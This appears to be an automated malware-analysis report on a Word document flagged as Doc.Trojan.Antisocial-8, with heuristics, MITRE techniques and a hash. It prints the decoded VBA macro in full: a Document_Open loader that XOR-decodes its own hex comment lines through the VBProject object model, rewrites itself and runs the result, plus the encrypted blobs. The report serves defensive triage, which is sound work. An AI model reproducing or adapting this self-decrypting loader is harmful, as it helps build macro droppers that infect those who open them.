Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a malicious VBA macro. The Document_Open macro is designed to execute upon opening the document. This macro appears to deobfuscate and execute code, likely to download and run a second-stage payload. The ClamAV detection 'Doc.Trojan.Antisocial-8' further supports its malicious nature.
Heuristics (5)

- ClamAV: Doc.Trojan.Antisocial-8 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Antisocial-8
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10285 bytes |

- SHA-256: dcea17e70b0871119bd16e05e811382bfc82edb3f9d3282e4b3696c81a5c363e
- Detection: ClamAV: Doc.Trojan.Antisocial-8
- Obfuscation or payload: likely (carved artifact contains 18 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    ' Runs automatically when the document is opened (OLE_VBA_DOCOPEN).
    ' Module lines 17 to 47 are the hex comment lines inside hAPEE below:
    ' each is read back through the VBProject object model, XOR-decoded
    ' against a per-line key, and then written back over itself.
    For A = 17 To 47
        B = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(A, 1)
        C = Asc(Chr("&H" & Mid(B, 2, 2)))   ' first hex byte marks where the key ends
        E = 2
        For D = C + 2 To Len(B) Step 2
            E = E + 2
            F = F & Chr(Asc(Chr("&H" & Mid(B, D, 2))) Xor Asc(Chr("&H" & Mid(B, E, 2))))
            If E = C Then E = 2             ' wrap back to the start of the key
        Next
        ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine A, F
        F = ""
    Next
    hAPEE                                   ' call the routine after its body has been rewritten
End Sub
Private Function hAPEE()
'1888944A4DC504C2CFB50C6AC7FA6A08B776ADBD955E0FFBE12728E54AA7B7C1
'1CC95FF5DE0FF25D86C30E97784C8F3087FE439B33E3B03CD2162FBB2685AA2FCF7DB7F42EC3176CFD68
'16A54447D3D296FBE83AB1EE213EF3EFB6D9CA
'203E881CFEAC04931A1BCB490C4C624D78E76EDEE761EA5674A4392C71427C1EDC73DEE56AE73249A52D2C66427C0BA13CD58C35
'20F96647292AA56969B653A135309515B2033E091785220CCF73871573FD67D12F295D02F7070D9679810705A13CD94D671803
'10E743C8614AEAA1A926B015
'166D198FB1E9D5068BE96E2E76EBD4C9E826DF81071E5DE0D29CB863E59D403B5BDFC386BF63E89D403B5BCCDE84A569E58C00196AA780C0FB45E48D0B2076EBC485B028C78000086AA7FD80BB63F8DB2B037AFDC899A12AABD847
'188083765A67450F3EF91064D4E61B2A47782F1CDB
'0E7D287942A08A354D0101CFEE1808446282A8
'08EFA78183C2EFA4C2F8CF9AA1DF
'0E1CC875C098D45AA707E0DDBA7FBA0CB0EC9873A705E0A5F42DE821AFB89879A65D83F7B079E1
'04365A53587D534F160B165A53587D534F161D1607
'061B554F3076253B683B017E386B753D75583D697D5A26787D563C7F7D583A7F3037755E3B782762256F19743A6B793B64327C3B0D74273B14683633187231331E7E2C37757730751E7E2C37752A7C327C
'06018948EF21E564E74AEC78A93CA94DEC6FA14AEC78A021DD69EC6FA96DEC6FC264F021B421B9
'168BD31531AD745B27B3ECC5B66D45
'1217C167767E35541952AF04040745205A78A502564315177165E94F3A1B5B7C5272B84E565415663037EA4744571572395CA41E565815007C7AB1
'142CEC197146DEBF46AC6489613229BADA66910CCE3B
'0A170852C9516720E9546736AC254037B1373572F8375C3DE95B6D3CE1526631BB6E78268A786C37E0
'0C3C7B41570C681E2C27445903616A2C741E397F4D4F18691A65585304396F4E0231234F531F247B2C7F1425323E741E397B2C0D52687E
'1235DC96C0EC558A157CBAB68C893BA24150B1E688892DA33508FCA7E0B83DEF7B1588F3AD9C1DEF6D15E1B6E2DC77AA331588F3AD9C1DEF6D
'1669F41EEB9E59267A38FD219166A8F13D435A05DD219166A8F13D435A1EDD3D91739BD63C5E
'060858463D702C
'14EB8968D8D2ABB8FE57BFE101AB96C4DB8B3A8EE71CF684E9E88C3881EC0BACFCFDFABD3886F907B6B7C5CC8D7FDAA0469BBDCFDDB3388FFC04BDFCF9DD8E3B8AEA0D94BBC5DDDE1B82E70DABE0EED69D2592F91CF4F2899FDC77CDA920BDAAE8D79A32
'1269B12E6C8ACF8A6D27D45618
'123A9E7DADE25F4D4B75EE09C48D313E656CF70FD8910F3F244EFB1ED98B30236B07BE4D97C2103D3F53F113DECC0C2C3D5FD012DF8F3E211B48F110DD967F706B0AA45DE2922B242454ED53EE8D312B2248F33EC28C29283949F712C3917F706B0A
'08873995D37DB5BA19C1EF50E6C356F6F254F0E94DBBD17BC5F556FFE25AE1A96FD7C456F8F756FBE257E1F411A4AE17D6E85DF0CA56F1F255F0A975FCE95CE6AF08B9A76DFDEE4AD1E85AE0EA5CFBF317C3C569E7E853F0E44DBBD17BD6E854E5E857F0E94DE6AF08BCA97AFAE35CD8E85DE0EB5CBBC456E0E94DDAE175FCE95CE6AE
'0EDF7A31AEBE9C961C11FAD6F5AC3E5ECDCBF1BA14458E83BC9E1945C7C8F99B1552DBD3F9B10E11FAD6F9B15A62CBCABC8B1B43C9DBE8FF4711E0D1EEB21B5DFADBF1AF1650DADBBC9A1642CB9ECFBA0E11FADFEEB81F458E83BC9E1945C7C8F99B1552DBD3F9B10E
'1A2ACE34F41110CA61761F1E2D7EAF46937464E437344F6C4240AB57803F46882219726E4244AB5A806238FB48585C71494F835B90647CAF4F327A72485EAB789D7F75B94147333E794BBC5391653E9C23266D71474FAD40DA4752890E1B6F71434FA040873921E34F35707A4867A150817D75E422196A705965A8789D7F75B9
'04B6E2D7C4D1D3C298E0F4E6C4D9DCD3D5C298E0F4F5D9DBC6D9D8D3D8C2C59E879F98F5D9D2D3FBD9D2C3DAD398F7D2D2F0C4D9DBE5C2C4DFD8D196E2F2
'128F3877BEC066E6BEC65E57EAA11481DBFB184A9E810592D7F95D33D1A3138BDBE14C57EAA803889ECE5B03D7B603A2D1EC4D1ADBAE12C8EDEE4E12FFB346A0D7E35D39DFAD03DC83CE5B03D7B603A2D1EC4D1ADBAE12C8F8FA541BF0A10B83
'06A2B6F6DECBC5E6D9C1C3CFD3CCC28CE5C3C0C7D2828B82E2D0C3C7
End Function
' Processing file: /opt/analyzer/scan_staging/751422be3f594d959b03a0ee79a68510.bin
' ====================================================
... (truncated)
```